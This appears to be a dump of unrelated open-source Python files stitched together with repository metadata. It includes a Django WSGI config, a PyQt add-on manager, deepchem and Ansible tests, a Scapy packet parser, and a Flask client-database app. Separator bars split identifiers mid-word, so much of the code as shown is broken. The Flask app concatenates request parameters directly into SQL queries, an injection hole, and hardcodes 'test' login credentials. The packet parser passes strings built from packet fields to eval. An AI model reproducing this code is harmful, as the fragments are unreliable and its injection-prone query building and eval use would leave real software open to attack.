entries = DBSession.query(User, PresenceEntry)\
.filter(PresenceEntry.user_id==User.id)\
.filter(PresenceEntry.ts>=start_date)\
.filter(PresenceEntry.ts<=end_date)\
.order_by(PresenceEntry.ts)
return dict(
entries=entries,
date=date,
prev_date=h.previous_day(date), next_date=h.next_day(date)
)
|
Alem/django-jfu | demo/demo/wsgi.py | Python | bsd-3-clause | 1,208 | 0.011589 | """
WSGI config for demo project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
import sys
import site
os.environ['DJANGO_SETTINGS_MODULE'] = | 'demo.settings'
SITE_ROOT = os.path.dirname(os.path.dirname( __file__ ))
site.addsitedir( SITE_ROOT + '/venv/local/lib/python2.7/site-packages' )
sys.path.append( SITE_ROOT )
exc_dir = 'scripts' if os.name == 'nt' else 'bin'
venv = '%s/venv/%s/activate_this.py' % (SITE_R | OOT, exc_dir )
activate_env = os.path.expanduser( venv )
execfile( activate_env, dict(__file__ = activate_env ))
import django.core.handlers.wsgi
application = django.core.handlers.wsgi.WSGIHandler()
|
marinkaz/orange3 | Orange/canvas/application/addons.py | Python | bsd-2-clause | 26,262 | 0.00019 | import sys
import sysconfig
import os
import re
import errno
import shlex
import shutil
import subprocess
import itertools
import concurrent.futures
from site import USER_SITE
from glob import iglob
from collections import namedtuple, deque
from xml.sax.saxutils import escape
from distutils import version
import pkg_resources
try:
import docutils.core
except ImportError:
docutils = None
from PyQt4.QtGui import (
QWidget, QDialog, QLabel, QLineEdit, QTreeView, QHeaderView,
QTextBrowser, QTextOption, QDialogButtonBox, QProgressDialog,
QVBoxLayout, QPalette, QStandardItemModel, QStandardItem,
QSortFilterProxyModel, QItemSelectionModel, QStyle, QStyledItemDelegate,
QStyleOptionViewItemV4, QApplication, QHBoxLayout
)
from PyQt4.QtCore import (
Qt, QObject, QMetaObject, QEvent, QSize, QTimer, QThread, Q_ARG
)
from PyQt4.QtCore import pyqtSignal as Signal, pyqtSlot as Slot
from ..gui.utils import message_warning, message_information, \
message_critical as message_error
from ..help.manager import get_dist_meta, trim
OFFICIAL_ADDONS = [
"Orange-Bioinformatics",
"Orange3-DataFusion",
"Orange3-Prototypes",
"Orange3-Text",
"Orange3-Network",
"Orange3-Associate",
]
Installable = namedtuple(
"Installable",
["name",
"version",
"summary",
"description",
"package_url",
"release_urls"]
)
ReleaseUrl = namedtuple(
"ReleaseUrl",
["filename",
"url",
"size",
"python_version",
"package_type"
]
)
Available = namedtuple(
"Available",
["installable"]
)
Installed = namedtuple(
"Installed",
["installable",
"local"]
)
def is_updatable(item):
if isinstance(item, Avai | lable):
return False
elif item.installable is None:
return False
else:
inst, dist = item
try:
v1 = version.StrictVersion(dist.version)
v2 = version.StrictVersion(inst.version)
except ValueError:
pass
else:
return v1 < v2
return (version.LooseVersion(dist.version) <
version.LooseVersion(inst.version))
class TristateCheckItemDelegate(QS | tyledItemDelegate):
"""
A QStyledItemDelegate which properly toggles Qt.ItemIsTristate check
state transitions on user interaction.
"""
def editorEvent(self, event, model, option, index):
flags = model.flags(index)
if not flags & Qt.ItemIsUserCheckable or \
not option.state & QStyle.State_Enabled or \
not flags & Qt.ItemIsEnabled:
return False
checkstate = model.data(index, Qt.CheckStateRole)
if checkstate is None:
return False
widget = option.widget
style = widget.style() if widget else QApplication.style()
if event.type() in {QEvent.MouseButtonPress, QEvent.MouseButtonRelease,
QEvent.MouseButtonDblClick}:
pos = event.pos()
opt = QStyleOptionViewItemV4(option)
self.initStyleOption(opt, index)
rect = style.subElementRect(
QStyle.SE_ItemViewItemCheckIndicator, opt, widget)
if event.button() != Qt.LeftButton or not rect.contains(pos):
return False
if event.type() in {QEvent.MouseButtonPress,
QEvent.MouseButtonDblClick}:
return True
elif event.type() == QEvent.KeyPress:
if event.key() != Qt.Key_Space and event.key() != Qt.Key_Select:
return False
else:
return False
if model.flags(index) & Qt.ItemIsTristate:
checkstate = (checkstate + 1) % 3
else:
checkstate = \
Qt.Unchecked if checkstate == Qt.Checked else Qt.Checked
return model.setData(index, checkstate, Qt.CheckStateRole)
class AddonManagerWidget(QWidget):
statechanged = Signal()
def __init__(self, parent=None, **kwargs):
super(AddonManagerWidget, self).__init__(parent, **kwargs)
self.setLayout(QVBoxLayout())
self.__header = QLabel(
wordWrap=True,
textFormat=Qt.RichText
)
self.__search = QLineEdit(
placeholderText=self.tr("Filter")
)
self.layout().addWidget(self.__search)
self.__view = view = QTreeView(
rootIsDecorated=False,
editTriggers=QTreeView.NoEditTriggers,
selectionMode=QTreeView.SingleSelection,
alternatingRowColors=True
)
self.__view.setItemDelegateForColumn(0, TristateCheckItemDelegate())
self.layout().addWidget(view)
self.__model = model = QStandardItemModel()
model.setHorizontalHeaderLabels(["", "Name", "Version", "Action"])
model.dataChanged.connect(self.__data_changed)
proxy = QSortFilterProxyModel(
filterKeyColumn=1,
filterCaseSensitivity=Qt.CaseInsensitive
)
proxy.setSourceModel(model)
self.__search.textChanged.connect(proxy.setFilterFixedString)
view.setModel(proxy)
view.selectionModel().selectionChanged.connect(
self.__update_details
)
header = self.__view.header()
header.setResizeMode(0, QHeaderView.Fixed)
header.setResizeMode(2, QHeaderView.ResizeToContents)
self.__details = QTextBrowser(
frameShape=QTextBrowser.NoFrame,
readOnly=True,
lineWrapMode=QTextBrowser.WidgetWidth,
openExternalLinks=True,
)
self.__details.setWordWrapMode(QTextOption.WordWrap)
palette = QPalette(self.palette())
palette.setColor(QPalette.Base, Qt.transparent)
self.__details.setPalette(palette)
self.layout().addWidget(self.__details)
def set_items(self, items):
self.__items = items
model = self.__model
model.clear()
model.setHorizontalHeaderLabels(["", "Name", "Version", "Action"])
for item in items:
if isinstance(item, Installed):
installed = True
ins, dist = item
name = dist.project_name
summary = get_dist_meta(dist).get("Summary", "")
version = ins.version if ins is not None else dist.version
else:
installed = False
(ins,) = item
dist = None
name = ins.name
summary = ins.summary
version = ins.version
updatable = is_updatable(item)
item1 = QStandardItem()
item1.setFlags(Qt.ItemIsEnabled | Qt.ItemIsSelectable |
Qt.ItemIsUserCheckable |
(Qt.ItemIsTristate if updatable else 0))
if installed and updatable:
item1.setCheckState(Qt.PartiallyChecked)
elif installed:
item1.setCheckState(Qt.Checked)
else:
item1.setCheckState(Qt.Unchecked)
item2 = QStandardItem(name)
item2.setFlags(Qt.ItemIsEnabled | Qt.ItemIsSelectable)
item2.setToolTip(summary)
item2.setData(item, Qt.UserRole)
if updatable:
version = "{} < {}".format(dist.version, ins.version)
item3 = QStandardItem(version)
item3.setFlags(Qt.ItemIsEnabled | Qt.ItemIsSelectable)
item4 = QStandardItem()
item4.setFlags(Qt.ItemIsEnabled | Qt.ItemIsSelectable)
model.appendRow([item1, item2, item3, item4])
self.__view.resizeColumnToContents(0)
self.__view.setColumnWidth(
1, max(150, self.__view.sizeHintForColumn(1)))
self.__view.setColumnWidth(
2, max(150, self.__view.sizeHintForColumn(2)))
if self.__items:
self.__view.selectionModel().select(
self.__view.model().index(0, 0),
QItemSelectionModel.Select | QItemSelectionModel.Rows
)
def item_state( |
lilleswing/deepchem | deepchem/models/tests/test_predict.py | Python | mit | 1,924 | 0.003119 | """
Tests that deepchem models make deterministic predictions.
"""
__author__ = "Bharath Ramsundar"
__copyright__ = "Copyright 2016, Stanford University"
__license__ = "MIT"
import os
import tempfile
import numpy as np
import unittest
import sklearn
import shutil
import tensorflow as tf
import deepchem as dc
from tensorflow.python.framework import test_util
from sklearn.ensemble import RandomForestClas | sifier
from sklearn.ensemble import RandomForestRegressor
class TestPredict(test_util.TensorFlowTestCase):
"""
Test that models make d | eterministic predictions
These tests guard against failures like having dropout turned on at
test time.
"""
def setUp(self):
super(TestPredict, self).setUp()
self.current_dir = os.path.dirname(os.path.abspath(__file__))
'''
def test_tf_progressive_regression_predict(self):
"""Test tf progressive multitask makes deterministic predictions."""
np.random.seed(123)
n_tasks = 9
n_samples = 10
n_features = 3
n_classes = 2
# Generate dummy dataset
ids = np.arange(n_samples)
X = np.random.rand(n_samples, n_features)
y = np.zeros((n_samples, n_tasks))
w = np.ones((n_samples, n_tasks))
dataset = dc.data.NumpyDataset(X, y, w, ids)
regression_metric = dc.metrics.Metric(
dc.metrics.mean_squared_error, task_averager=np.mean)
model = dc.models.ProgressiveMultitaskRegressor(
n_tasks,
n_features,
layer_sizes=[50],
bypass_layer_sizes=[10],
dropouts=[.25],
learning_rate=0.003,
weight_init_stddevs=[.1],
alpha_init_stddevs=[.02],
batch_size=n_samples)
# Fit trained model
model.fit(dataset, nb_epoch=25)
model.save()
# Check same predictions are made.
y_pred_first = model.predict(dataset)
y_pred_second = model.predict(dataset)
np.testing.assert_allclose(y_pred_first, y_pred_second)
'''
|
SneakersInc/sniffmypacketsv2 | src/sniffmypacketsv2/transforms/common/packetParser.py | Python | apache-2.0 | 2,024 | 0.003953 | #!/usr/bin/env python
# Welcome to Gobbler, the Scapy pcap parser and dump scripts
# Part of the sniffMyPackets suite http://www.sniffmypackets.net
# Written by @catalyst256 / catalyst256@gmail.com
import datetime
from layers.http import *
from layers.BadLayers import *
from auxtools import error_logging
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
from collectio | ns import OrderedDict
bind_layers(TCP, HTTP)
def rename_layer(x | , n):
n = n.lower().replace(' ', '_').replace('-', '_').replace('.', '_') + '_'
return dict((n+k.lower(), f(v) if hasattr(v, 'keys') else v) for k, v in x.items())
def find_layers(pkts, pcap, pcap_id, streamid):
packet = OrderedDict()
count = 1
pcap_id = pcap_id.encode('utf-8')
streamid = streamid.encode('utf-8')
try:
for p in pkts:
header = {"Buffer": {"timestamp": datetime.datetime.fromtimestamp(p.time).strftime('%Y-%m-%d %H:%M:%S.%f'),
"packetnumber": count, "PCAP ID": pcap_id, "pcapfile": pcap, "StreamID": streamid}}
packet.update(header)
counter = 0
while True:
layer = p.getlayer(counter)
if layer != None:
i = int(counter)
x = p[0][i].fields
t = exclude_layers(x, layer.name)
s = rename_layer(t, layer.name)
v = '{"' + layer.name.replace('.', '_') + '[' + str(i) + ']' + '":' + str(s) + '}'
s = eval(v)
try:
del s['HTTP[3]']
del s['HTTP[5]']
except KeyError:
pass
packet.update(s)
else:
break
counter += 1
count += 1
yield packet
packet.clear()
except Exception as e:
error_logging(str(e), 'PacketParser')
pass
|
SpiderOak/flowbot | src/decorators.py | Python | mpl-2.0 | 1,211 | 0 | from functools import wraps
def mentioned(bot_command):
"""Only execute the decorated bot command if the bot was mentioned."""
@wraps(bot_command)
def _func(bot, message, *args, **kwargs):
if bot.mentioned(message):
return bot_command(bot, message, *args, **kwargs)
return _func
def admin_only(bot_command):
"""Only execute the decorated bot command if the user is an admin."""
@wraps(bot_command)
def _func(bot, message, *args, **kwargs):
if bot.from_admin(message):
return bot_command(bot, message, *args, **kwargs)
return _func
def channel_admin_only(bot_command):
"""Only execute the decorated bot command if the user is an admin."""
@wraps(bot_command)
def _f | unc(bot, message, *args, **kwargs):
if bot.from_channel_admin(message):
return bot_command(bot, message, *args, **kwargs)
return _func
def org_admin_only(bot_command):
"""Only execute the decorated bot command if the user is an admin." | ""
@wraps(bot_command)
def _func(bot, message, *args, **kwargs):
if bot.from_org_admin(message):
return bot_command(bot, message, *args, **kwargs)
return _func
|
alixedi/recline | recline.py | Python | mit | 3,765 | 0.031076 | from bottle import template, route, run, request
from imp import load_source
from argparse import ArgumentParser
from os.path import basename, splitext
from subprocess import check_output
import os
class ScriptRender(object):
"""Render a script as an HTML page."""
def __init__(self, script):
self.script = script
def render(self):
return template(self.get_template(), {'self': self})
def get_template(self):
return 'page'
def get_title(self):
title, _ = splitext(basename(self.script))
return title
def get_argparsers(self):
mod = load_source('', self.script)
f = lambda x: isinstance(x, ArgumentParser)
return filter(f, mod.__dict__.values())
def render_argparser(self, argparser):
return ArgparserRender(argparser).render()
class ArgparserRender(object):
"""Render an argparse object as an HTML form."""
def __init__(self, argparser):
self.argparser = argparser
def render(self):
return template(self.get_template(), {'self': self})
def get_template(self):
return 'form'
def get_description(self):
return self.argparser.description
def get_groups(self):
return self.argparser._action_groups
def render_group(self, group):
return GroupRender(group).render()
def get_epilog(self):
return self.argparser.epilog
class GroupRender(object):
"""Render an action group as an HTML formset."""
def __init__(self, group):
self.group = group
def render(self):
return template(self.get_template(), {'self': self})
def get_template(self):
return 'formset'
def get_title(self):
return self.group.title
def get_actions(self):
actions = self.group._group_actions
no_help = lambda a: not type(a).__name__ == '_HelpAction'
return filter(no_help, actions)
def render_action(self, action):
return ActionRender(action).render()
class ActionRender(object):
"""Render an action as an HTML field."""
def __init__(self, action):
self.action = action
def render(self):
return template(self.get_template(), {'self': self})
def get_template(self):
return 'field'
def get_flag(self):
opt = self.action.option_strings
if len(opt) > 0:
return opt[0]
return None
def get_name(self):
flag = self.get_flag()
if flag:
return flag.strip('-')
return self.action.dest
def get_required(self):
return 'required' if self.action.required else ''
def get_default(self):
value = self.action.default
if hasattr(value, '__call__'):
return value.__name__
return value
def get_help(self):
return self.action.help
def get_type(self):
kls = type(self.action).__name__
fmt = '_Store%sAction'
if kls in [fmt % x for x in ('Const', 'True', 'False')]:
return 'checkbox'
elif kls == '_StoreAction':
typ = self.action.type.__name__
mpg = {'int': 'number',
'file': 'file'}
if typ in mpg:
return mpg[typ]
return ''
@route('/')
def send_form():
return __R__.render()
@route('/', method='POST')
def process_form():
args = []
for argparser in __R__.get_argparsers():
argparser_render = ArgparserRender(argparser)
for group in argparser_render.get_groups():
group_render = GroupRender(group)
for action in group_render.get_actions():
action_render = ActionRender(action)
name = action_render.get_name()
value = request.forms.get(name)
if value:
flag = action_render.get_flag()
if flag:
args = args + [flag]
args = args + [value]
print ['python'] + [__R__.script] + args
return check_output(['python'] + [__R__.script] + args)
parser = ArgumentParser(description='Web Apps from CLI sc | ripts.')
parser.add_argument('script', type=file)
if __name__ == '__main__':
args = parser.parse_args()
global __R__
__R__ = ScriptRender(args.script.name)
r | un(host='localhost', port=8080) |
adsabs/ADSDeploy | ADSDeploy/tests/test_functional/test_integration_tester.py | Python | gpl-3.0 | 5,702 | 0.000702 | #!/usr/bin/env python
# encoding: utf-8
"""
Functional tests of the RabbitMQ Workers
"""
import mock
import json
import unittest
import ADSDeploy.app as app
from ADSDeploy.pipeline.workers import IntegrationTestWorker, \
DatabaseWriterWorker
from ADSDeploy.webapp.views import MiniRabbit
from ADSDeploy.models import Base, Deployment
RABBITMQ_URL = 'amqp://guest:guest@172.17.0.1:6672/adsdeploy_test?' \
'socket_timeout=10&backpressure_detection=t'
class TestIntegrationTestWorker(unittest.TestCase):
"""
Tests the functionality of the Integration Worker
"""
def setUp(self):
# Create queue
with MiniRabbit(RABBITMQ_URL) as w:
w.make_queue('in', exchange='test')
w.make_queue('out', exchange='test')
w.make_queue('database', exchange='test')
# Create database
app.init_app({
'SQLALCHEMY_URL': 'sqlite://',
'SQLALCHEMY_ECHO': False,
})
Base.metadata.bind = app.session.get_bind()
Base.metadata.create_all()
self.app = app
def tearDown(self):
# Destroy queue
with MiniRabbit(RABBITMQ_URL) as w:
w.delete_queue('in', exchange='test')
w.delete_queue('out', exchange='test')
w.delete_queue('database', exchange='test')
# Destroy database
Base.metadata.drop_all()
self.app.close_app()
@mock.patch('ADSDeploy.pipeline.integration_tester.IntegrationTestWorker.run_test')
def test_workflow_of_integration_worker(self, mock_run_test):
"""
General work flow of the integration worker from receiving a packet,
to finishing with a packet.
"""
# Worker receives a packet, most likely from the deploy worker
# Example packet:
#
# {
# 'application': 'staging',
# 'service': 'adsws',
# 'release': '',
# 'config': {},
# }
#
#
example_packet = {
'application': 'staging',
'service': 'adsws',
'version': 'v1.0.0',
'config': {},
'action': 'test'
}
expected_packet = example_packet.copy()
expected_packet['tested'] = True
# Override the run test returned value. This means the logic of the test
# does not have to be mocked
mock_run_test.return_value = expected_packet
with MiniRabbit(RABBITMQ_URL) as w:
w.publish(route='in', exchange='test', payload=json.dumps(example_packet))
# Worker runs the tests
params = {
'RABBITMQ_URL': RABBITMQ_URL,
'exchange': 'test',
'subscribe': 'in',
'publish': 'out',
'status': 'database',
'TEST_RUN': True
}
test_worker = IntegrationTestWorker(params=params)
test_worker.run()
test_worker.connection.close()
# Worker sends a packet to the next worker
with MiniRabbit(RABBITMQ_URL) as w:
m_in = w.message_count(queue='in')
m_out = w.message_count(queue='out')
p = w.get_packet(queue='out')
self.assertEqual(m_in, 0)
self.assertEqual(m_out, 1)
# Remove values that are not in the starting packet
self.assertTrue(p.pop('tested'))
self.assertEqual(
p,
example_packet
)
@mock.patch('ADSDeploy.pipeline.integration_tester.IntegrationTestWorker.run_test')
def test_db_writes_on_test_pass(self, mocked_run_test):
"""
Check that | the database is being written to when a test passes
"""
# Stub data
packet = {
'application': 'adsws',
'environment': 'staging',
| 'version': 'v1.0.0',
}
expected_packet = packet.copy()
expected_packet['tested'] = True
mocked_run_test.return_value = expected_packet
# Start the IntegrationTester worker
params = {
'RABBITMQ_URL': RABBITMQ_URL,
'exchange': 'test',
'subscribe': 'in',
'publish': 'out',
'status': 'database',
'TEST_RUN': True
}
# Push to rabbitmq
with MiniRabbit(RABBITMQ_URL) as w:
w.publish(route='in', exchange='test', payload=json.dumps(packet))
test_worker = IntegrationTestWorker(params=params)
test_worker.run()
test_worker.connection.close()
# Assert there is a packet on the publish queue
with MiniRabbit(RABBITMQ_URL) as w:
self.assertEqual(w.message_count('out'), 1)
self.assertEqual(w.message_count('database'), 1)
# Start the DB Writer worker
params = {
'RABBITMQ_URL': RABBITMQ_URL,
'exchange': 'test',
'subscribe': 'database',
'TEST_RUN': True
}
db_worker = DatabaseWriterWorker(params=params)
db_worker.app = self.app
db_worker.run()
db_worker.connection.close()
with self.app.session_scope() as session:
all_deployments = session.query(Deployment).all()
self.assertEqual(
len(all_deployments),
1,
msg='More (or less) than 1 deployment entry: {}'
.format(all_deployments)
)
deployment = all_deployments[0]
for key in packet:
self.assertEqual(
packet[key],
getattr(deployment, key)
)
self.assertEqual(deployment.tested, True)
|
henrygd/All-Seas-Client-Database-Application | app.py | Python | mit | 5,574 | 0.001435 | from flask import Flask, render_template, request, jsonify, \
redirect, url_for, session, send_file
from functools import wraps
import sqlite3
import subprocess
import sql_clients
# creates application object
app = Flask(__name__)
# encrypts sessions
app.secret_key = 'long random string'
# decorator redirects to login page if user is not logged in
def login_required(f):
@wraps(f)
def wrap(*args, **kwargs):
if 'logged_in' in session:
return f(*args, **kwargs)
else:
return redirect(url_for('login'))
return wrap
# renders index.html if logged in
@app.route('/')
@login_required
def home():
return render_template('index.html')
# checks username / password, returns error, logs user in
@app.route('/login', methods=['GET', 'POST'])
def login():
if 'logged_in' in session:
return redirect(url_for('home'))
error = None
if request.method == 'POST':
user, password = request.form['username'], request.form['password']
if len(user) < 20 and len(password) < 20:
if user != 'test' or password != 'test':
error = 'Invalid credentials. Please try again.'
else:
session.permanent = True
session['logged_in'] = True
return redirect(url_for('home'))
else:
error = 'Under twenty characters, please.'
return render_template('login.html', error=error)
# logs user out (deletes session)
@app.route('/logout')
@login_required
def logout():
session.pop('logged_in', None)
return redirect(url_for('login'))
# adds new client to database
@app.route('/addclient', methods=['POST'])
@login_required
def addclient():
name = request.form['name']
birthdate = request.form['birthdate']
email = request.form['email']
phone = request.form['phone']
address = request.form['address']
citystate = request.form['citystate']
notes = request.form['notes']
favoriteline = request.form['favoriteline']
cabintype = request.form['cabintype']
diningtime = request.form['diningtime']
travelswith = request.form['travelswith']
trips = request.form['trips']
values = (name, birthdate, email, phone, address, citystate,
notes, favoriteline, cabintype, diningtime, travelswith, trips)
try:
lastid = sql_clients.addclient(values)
return jsonify(result="Client added successfully.", id=lastid)
except:
return jsonify(result="Error adding client.")
# searches for and returns clients matching parameters
@app.route('/clientsearch')
@login_required
def clientsearch():
query = request.args.get('a')
value = request.args.get('z')
with sqlite3.connect('clients.db') as conn:
c = conn.cursor()
c.execute("SELECT id, name, citystate FROM clients WHERE " + value +
" like \'%"+query+"%\';")
try:
result = [dict(id=row[0], name=row[1], citystate=row[2])
for row in c.fetchall()]
exc | ept:
result = "error1"
return jsonify(result=result)
# returns full client information for specific id
@app.route('/openclient')
@login_required
def openclient():
clientid = (request.args.get('b'),)
with sqlite3.connect('clients.db') as conn:
c = conn.cursor()
c.execute("SELECT * FROM clients WHERE id=?", clientid)
try:
result = [di | ct(id=row[0], name=row[1], birthdate=row[2],
email=row[3], phone=row[4], address=row[5],
citystate=row[6], notes=row[7], favoriteline=row[8],
cabintype=row[9], diningtime=row[10], travelswith=row[11],
trips=row[12]) for row in c.fetchall()]
except:
result = "error"
return jsonify(result=result)
# deletes client
@app.route('/deleteclient')
@login_required
def deleteclient():
clientid = (request.args.get('id'),)
with sqlite3.connect('clients.db') as conn:
c = conn.cursor()
try:
c.execute("DELETE FROM clients WHERE id=?", clientid)
result = "Client deleted."
except:
result = "error"
return jsonify(result=result)
# updates client info
@app.route('/updateclient', methods=['POST'])
@login_required
def updateclient():
id = request.form['id']
name = request.form['name']
birthdate = request.form['birthdate']
email = request.form['email']
phone = request.form['phone']
address = request.form['address']
citystate = request.form['citystate']
notes = request.form['notes']
favoriteline = request.form['favoriteline']
cabintype = request.form['cabintype']
diningtime = request.form['diningtime']
travelswith = request.form['travelswith']
trips = request.form['trips']
values = (name, birthdate, email, phone, address, citystate, notes,
favoriteline, cabintype, diningtime, travelswith, trips, id)
sql_clients.updateclient(values)
return jsonify(result="Client updated successfully.")
# sends database file as attachment
@app.route('/downloaddb')
@login_required
def downloaddb():
return send_file('clients.db', as_attachment=True)
# converts database to spreadsheet, sends as attachment
@app.route('/dlspreadsheet')
@login_required
def dlspreadsheet():
subprocess.call('sqlite3 -header -separator "\t" clients.db \'select * '
'from clients;\'> clients.csv', shell=True)
return send_file('clients.csv', as_attachment=True)
|
ravibhure/ansible | test/units/module_utils/basic/test_argument_spec.py | Python | gpl-3.0 | 18,173 | 0.002751 | # -*- coding: utf-8 -*-
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
# (c) 2016 Toshio Kuratomi <tkuratomi@ansible.com>
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import json
import os
import pytest
from ansible.compat.tests.mock import MagicMock, patch
from ansible.module_utils import basic
from ansible.module_utils.six import string_types
from ansible.module_utils.six.moves import builtins
from units.mock.procenv import ModuleTestCase, swap_stdin_and_argv
MOCK_VALIDATOR_FAIL = MagicMock(side_effect=TypeError("bad conversion"))
# Data is argspec, argument, expected
VALID_SPECS = (
# Simple type=int
({'arg': {'type': 'int'}}, {'arg': 42}, 42),
# Type=int with conversion from string
({'arg': {'type': 'int'}}, {'arg': '42'}, 42),
# Simple type=float
({'arg': {'type': 'float'}}, {'arg': 42.0}, 42.0),
# Type=float conversion from int
({'arg': {'type': 'float'}}, {'arg': 42}, 42.0),
# Type=float conversion from string
({'arg': {'type': 'float'}}, {'arg': '42.0'}, 42.0),
# Type=float conversion from string without decimal point
({'arg': {'type': 'float'}}, {'arg': '42'}, 42.0),
# Simple type=bool
({'arg': {'type': 'bool'}}, {'arg': True}, True),
# Type=int with conversion from string
({'arg': {'type': 'bool'}}, {'arg': 'yes'}, True),
# Type=str converts to string
({'arg': {'type': 'str'}}, {'arg': 42}, '42'),
# Type is implicit, converts to string
({'arg': {'type': 'str'}}, {'arg': 42}, '42'),
# parameter is required
({'arg': {'required': True}}, {'arg': 42}, '42'),
)
INVALID_SPECS = (
# Type is int; unable to convert this string
({'arg': {'type': 'int'}}, {'arg': "bad"}, "invalid literal for int() with base 10: 'bad'"),
# Type is int; unable to convert float
({'arg': {'type': 'int'}}, {'arg': 42.1}, "'float'> cannot be converted to an int"),
# type is a callable that fails to convert
({'arg': {'type': MOCK_VALIDATOR_FAIL}}, {'arg': "bad"}, "bad conversion"),
# unknown parameter
({'arg': {'type': 'int'}}, {'other': 'bad', '_ansible_module_name': 'ansible_unittest'},
'Unsupported parameters for (ansible_unittest) module: other Supported parameters include: arg'),
# parameter is required
({'arg': {'required': True}}, {}, 'missing required arguments: arg'),
)
@pytest.fixture
def complex_argspec():
arg_spec = dict(
foo=dict(required=True, aliases=['dup']),
bar=dict(),
bam=dict(),
baz=dict(fallback=(basic.env_fallback, ['BAZ'])),
bar1=dict(type='bool'),
zardoz=dict(choices=['one', 'two']),
)
mut_ex = (('bar', 'bam'),)
req_to = (('bam', 'baz'),)
kwargs = dict(
argument_spec=arg_spec,
mutually_exclusive=mut_ex,
required_together=req_to,
no_log=True,
add_file_common_args=True,
supports_check_mode=True,
)
return kwargs
@pytest.fixture
def options_argspec_list():
options_spec = dict(
foo=dict(required=True, aliases=['dup']),
bar=dict(),
bam=dict(),
baz=dict(fallback=(basic.env_fallback, ['BAZ'])),
bam1=dict(),
bam2=dict(default='test'),
bam3=dict(type='bool'),
)
arg_spec = dict(
foobar=dict(
type='list',
elements='dict',
options=options_spec,
mutually_exclusive=[
['bam', 'bam1']
],
required_if=[
['foo', 'hello', ['bam']],
['foo', 'bam2', ['bam2']]
],
required_one_of=[
['bar', 'bam']
],
required_together=[
['bam1', 'baz']
]
)
)
kwargs = dict(
argument_spec=arg_spec,
no_log=True,
add_file_common_args=True,
supports_check_mode=True
)
return kwargs
@pytest.fixture
def options_argspec_dict():
# should test ok, for options in dict format.
kwargs = options_argspec_list()
kwargs['argument_spec']['foobar']['type'] = 'dict'
return kwargs
#
# Tests for one aspect of arg_spec
#
@pytest.mark.parametrize('argspec, expected, stdin', [(s[0], s[2], s[1]) for s in VALID_SPECS],
indirect=['stdin'])
def test_validator_basic_types(argspec, expected, stdin):
am = basic.AnsibleModule(argspec)
| if 'type' in argspec['arg']:
type_ = getattr(builtins, argspec['arg']['type'])
else:
type_ = str
assert isinstance(am.params['arg'], type_)
assert am.params['arg'] == expected
@pytest.mark.parametrize('stdin', [{'arg': | 42}], indirect=['stdin'])
def test_validator_function(mocker, stdin):
# Type is a callable
MOCK_VALIDATOR_SUCCESS = mocker.MagicMock(return_value=27)
argspec = {'arg': {'type': MOCK_VALIDATOR_SUCCESS}}
am = basic.AnsibleModule(argspec)
assert isinstance(am.params['arg'], int)
assert am.params['arg'] == 27
@pytest.mark.parametrize('argspec, expected, stdin', [(s[0], s[2], s[1]) for s in INVALID_SPECS],
indirect=['stdin'])
def test_validator_fail(stdin, capfd, argspec, expected):
with pytest.raises(SystemExit):
basic.AnsibleModule(argument_spec=argspec)
out, err = capfd.readouterr()
assert not err
assert expected in json.loads(out)['msg']
assert json.loads(out)['failed']
class TestComplexArgSpecs:
"""Test with a more complex arg_spec"""
@pytest.mark.parametrize('stdin', [{'foo': 'hello'}, {'dup': 'hello'}], indirect=['stdin'])
def test_complex_required(self, stdin, complex_argspec):
"""Test that the complex argspec works if we give it its required param as either the canonical or aliased name"""
am = basic.AnsibleModule(**complex_argspec)
assert isinstance(am.params['foo'], str)
assert am.params['foo'] == 'hello'
@pytest.mark.parametrize('stdin', [{'foo': 'hello', 'bam': 'test'}], indirect=['stdin'])
def test_complex_type_fallback(self, mocker, stdin, complex_argspec):
"""Test that the complex argspec works if we get a required parameter via fallback"""
environ = os.environ.copy()
environ['BAZ'] = 'test data'
mocker.patch('ansible.module_utils.basic.os.environ', environ)
am = basic.AnsibleModule(**complex_argspec)
assert isinstance(am.params['baz'], str)
assert am.params['baz'] == 'test data'
@pytest.mark.parametrize('stdin', [{'foo': 'hello', 'bar': 'bad', 'bam': 'bad2'}], indirect=['stdin'])
def test_fail_mutually_exclusive(self, capfd, stdin, complex_argspec):
"""Fail because of mutually exclusive parameters"""
with pytest.raises(SystemExit):
am = basic.AnsibleModule(**complex_argspec)
out, err = capfd.readouterr()
results = json.loads(out)
assert results['failed']
assert results['msg'] == "parameters are mutually exclusive: bar, bam"
@pytest.mark.parametrize('stdin', [{'foo': 'hello', 'bam': 'bad2'}], indirect=['stdin'])
def test_fail_required_together(self, capfd, stdin, complex_argspec):
"""Fail because only one of a required_together pair of parameters was specified"""
with pytest.raises(SystemExit):
am = basic.AnsibleModule(**complex_argspec)
out, err = capfd.readouterr()
results = json.loads(out)
assert results['failed']
assert results['msg'] == "parameters are required together: bam, baz"
@pytest.mark.parametrize('stdin', [{'foo': 'hello', 'bar': 'hi'}], indirect=['stdin'])
def test_fail_required_together_and_default(self, capfd, stdin, complex_argspec):
"""Fail because one of a required_together pair of parameters has a default and the other was not specified"""
complex_argspec['argument_spec']['baz'] = {'default': 42}
with pytest.raises(SystemExit):
am = basic.AnsibleModule(**complex_argspec)
out, err |
ConPaaS-team/conpaas | conpaas-client/setup.py | Python | bsd-3-clause | 705 | 0.005674 | #!/usr/bin/env python
from setuptools import setup
CPSVERSION = '204'
long_description = """
ConPaaS: an integrated runtime environment for elastic Cloud applications
=========================================================================
"""
setup(name='cpsclient',
version=CPSVERSION,
description='ConPaaS command line clie | nt',
author='ConPaaS team',
author_email='info@conpaas.eu',
url='http://www.conpaas.eu/',
download_url='http://www.conpaas.eu/download/',
license='BSD',
packages=['cps',],
scripts=['cpsclient.py'],
install_requ | ires=['cpslib'],
dependency_links=[ 'http://www.conpaas.eu/dl/cpslib-%s.tar.gz' % CPSVERSION, ],)
|
appsembler/mayan_appsembler | apps/dynamic_search/models.py | Python | gpl-3.0 | 2,130 | 0.001878 | from __future__ import absolute_import
import urlparse
import urllib
from datetime import datetime
